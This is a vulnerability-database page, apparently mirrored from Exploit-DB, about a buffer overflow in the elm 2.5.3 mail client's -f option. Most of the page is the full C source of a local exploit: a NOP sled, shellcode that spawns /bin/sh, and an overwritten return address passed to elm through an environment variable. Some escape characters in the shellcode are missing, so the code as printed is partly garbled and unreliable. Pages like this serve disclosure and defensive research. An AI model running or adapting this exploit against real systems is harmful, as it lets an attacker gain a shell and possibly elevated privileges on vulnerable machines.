Elm 2.5.3 – Alternative-Folder Buffer Overflow

Elm 2.5.3 – Alternative-Folder Buffer Overflow

漏洞ID 1053516 漏洞类型
发布时间 2001-02-13 更新时间 2001-02-13
图片[1]-Elm 2.5.3 – Alternative-Folder Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-Elm 2.5.3 – Alternative-Folder Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/20645
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/2403/info

There is a buffer overflow in elm 2.5 PL3. This overflow is accessible by passing a long string to the -f (Alternative-Folder) command-line option. This vulnerability may not be restricted to this version of elm. 

/***
    -------------
    elm253-exploit.c
    -------------
***/

#include <stdlib.h>

#define NOP 0x90
#define LEN 356
#define OFFSET 0
#define RET 0xbffffa64

unsigned long dame_sp() {
        __asm__("movl %esp,%eax");
}

void main() {

        static char shellcode[]=
/* "x31xc0"   */              /* xorl %eax,%eax        */
/* "x31xdb"   */              /* xorl %ebx,%ebx        */
/* "xb0x17"   */              /* movb $0x17,%al        */
/* "xcdx80"   */              /* int $0x80             */
"xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8d"
"x4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6ex2fx73x68x58";

        int i=0;
        int cont=0;
        char buffer[LEN+4];
        char kid[6+LEN+4];

        printf("-------------------------------------n");
        printf("elm buffer overflow exploit by _kiss_n");
        printf("-------------------------------------n");

        for (i=0;i<=LEN;i+=4)
                *(long *) &buffer[i] = RET;

        for (i=0;i<LEN-strlen(shellcode)-100;i++)
                buffer[i]=NOP;

        for (i=LEN-strlen(shellcode)-100;i<LEN-100;i++)
                buffer[i]=shellcode[cont++];

        strcpy(kid,"KID=");
        strcat(kid,buffer);
        putenv(kid);
        system("/usr/local/bin/elm -f $KID");
}

相关推荐: Solaris catman Race Condition Vulnerability

Solaris catman Race Condition Vulnerability 漏洞ID 1103618 漏洞类型 Race Condition Error 发布时间 2000-12-18 更新时间 2000-12-18 CVE编号 N/A CNNVD…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享